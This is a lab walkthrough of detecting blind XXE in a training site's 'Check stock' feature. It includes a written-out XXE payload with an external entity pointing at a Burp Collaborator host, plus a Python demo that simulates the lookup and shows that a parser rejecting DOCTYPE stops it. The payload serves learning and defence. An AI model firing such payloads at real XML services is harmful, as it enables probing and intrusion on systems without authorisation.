Blind XXE with out-of-band interaction

Description

This lab has a "Check stock" feature that parses XML input but does not display the result.

You can detect the blind XXE vulnerability by triggering out-of-band interactions with an external domain.

To solve the lab, use an external entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.

Approach

After accessing the lab and using the "Check stock" feature, I noticed a POST request sending an XML body to the backend:

POST /product/stock HTTP/2
Host: 0a570048043caf7c81360333000b0063.web-security-academy.net
Cookie: session=bsdP3bHoQNLt82EtJQpWD4CaYWkpmonQ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 ...

<?xml version="1.0" encoding="UTF-8"?>
	<stockCheck>
		<productId>1</productId>
		<storeId>3</storeId>
	</stockCheck>

My first attempt, a classic XXE that pulls a local file into the response, returned nothing: the stock check parses the XML but never reflects the parsed value, so there is no in-band channel to read the entity's content through. Since I had no knowledge of other backend systems to target, I switched to out-of-band detection via Burp Collaborator. The payload declares an external entity whose SYSTEM identifier is my Collaborator URL and references it inside a field the application parses, which forces the parser to resolve the URL even though the value is never displayed:

<?xml version="1.0" encoding="UTF-8"?>
	<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://7s0ammq9uf5jhfq2st82gtjca3gu4ks9.oastify.com"> ]>
	<stockCheck>
		<productId>&xxe;</productId>
		<storeId>1</storeId>
	</stockCheck>

After sending this request and polling Burp Collaborator, I observed multiple DNS lookup requests. This interaction confirmed the blind XXE vulnerability, and the lab was solved. The DNS lookups are the parser resolving the entity's hostname before it attempts the HTTP fetch, so a DNS hit on its own already proves the backend dereferenced the external entity; that matters in environments where outbound HTTP is filtered but DNS resolution still leaks out.
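To make the mechanism behind the payload above concrete without touching the lab, here is an added example (my own code, not part of the original write-up or of the lab) that builds the same stockCheck payload and feeds it to Python's standard-library expat parser. libxml2-based parsers fetch SYSTEM entities themselves; expat instead hands the entity's URL to an ExternalEntityRefHandler, so the handler here stands in for the network call and records what a vulnerable backend would have fetched. It assumes the Collaborator hostname from the write-up (any Collaborator or interactsh domain works the same way) and shows two things: the vulnerable configuration dereferences the URL while the parsed productId stays empty, which is exactly why the XXE is blind, and the hardened configuration rejects any DOCTYPE before an entity can be declared.

```python
"""Added example, not the lab's code: how a blind XXE payload still produces an
out-of-band interaction, shown with Python's stdlib expat parser.

Assumptions: the Collaborator host is the one from the write-up; the
ExternalEntityRefHandler models the fetch a libxml2-style parser would do."""
import xml.parsers.expat as expat

COLLABORATOR_HOST = "7s0ammq9uf5jhfq2st82gtjca3gu4ks9.oastify.com"  # from the write-up


def build_blind_xxe_payload(callback_host, store_id="1"):
    """Build the stockCheck body from the write-up with an external entity that
    points at the callback host. The entity is referenced in <productId>, so the
    parser has to resolve it before the application can read that field."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://{callback_host}"> ]>\n'
        "<stockCheck>\n"
        "  <productId>&xxe;</productId>\n"
        f"  <storeId>{store_id}</storeId>\n"
        "</stockCheck>\n"
    )


def parse_stock_check(xml_data, allow_dtd):
    """Parse a stockCheck document and return (fields, fetched_urls).

    allow_dtd=True models the vulnerable backend: the DOCTYPE is accepted and
    every SYSTEM entity URL is handed to the fetch callback (recorded in
    fetched_urls), while the entity's value never reaches the parsed fields.
    allow_dtd=False is the hardened configuration: any DOCTYPE aborts parsing
    before an entity can be declared (the same approach defusedxml takes).
    """
    fields = {}
    fetched_urls = []
    text = []

    parser = expat.ParserCreate()

    def on_doctype(doctype_name, system_id, public_id, has_internal_subset):
        if not allow_dtd:
            raise ValueError("DOCTYPE declarations are not accepted")

    def on_external_entity(context, base, system_id, public_id):
        # A libxml2-style parser would issue the DNS lookup and HTTP GET here;
        # this stand-in only records the URL. Returning 1 means "handled",
        # so parsing continues with an empty substitution for &xxe;.
        fetched_urls.append(system_id)
        return 1

    def on_start(name, attrs):
        text.clear()

    def on_chars(data):
        text.append(data)

    def on_end(name):
        fields[name] = "".join(text).strip()
        text.clear()

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_chars
    parser.EndElementHandler = on_end
    parser.Parse(xml_data, True)
    return fields, fetched_urls


def hardened_rejects(xml_data):
    """True if the hardened (DTD-free) parser refuses the document."""
    try:
        parse_stock_check(xml_data, allow_dtd=False)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = build_blind_xxe_payload(COLLABORATOR_HOST)
    fields, urls = parse_stock_check(payload, allow_dtd=True)
    print("vulnerable parser would fetch:", urls)  # the out-of-band interaction
    print("productId seen by the app:", repr(fields["productId"]))  # '' -> blind
    print("hardened parser rejects payload:", hardened_rejects(payload))
```

Run it and the vulnerable path reports the Collaborator URL as fetched while productId is the empty string: the application gets nothing useful back, so the only evidence of the vulnerability is the callback. The hardened path refuses the document at the DOCTYPE, which is the fix to ask for; disabling external entity resolution alone still leaves the internal-subset and billion-laughs vectors in play.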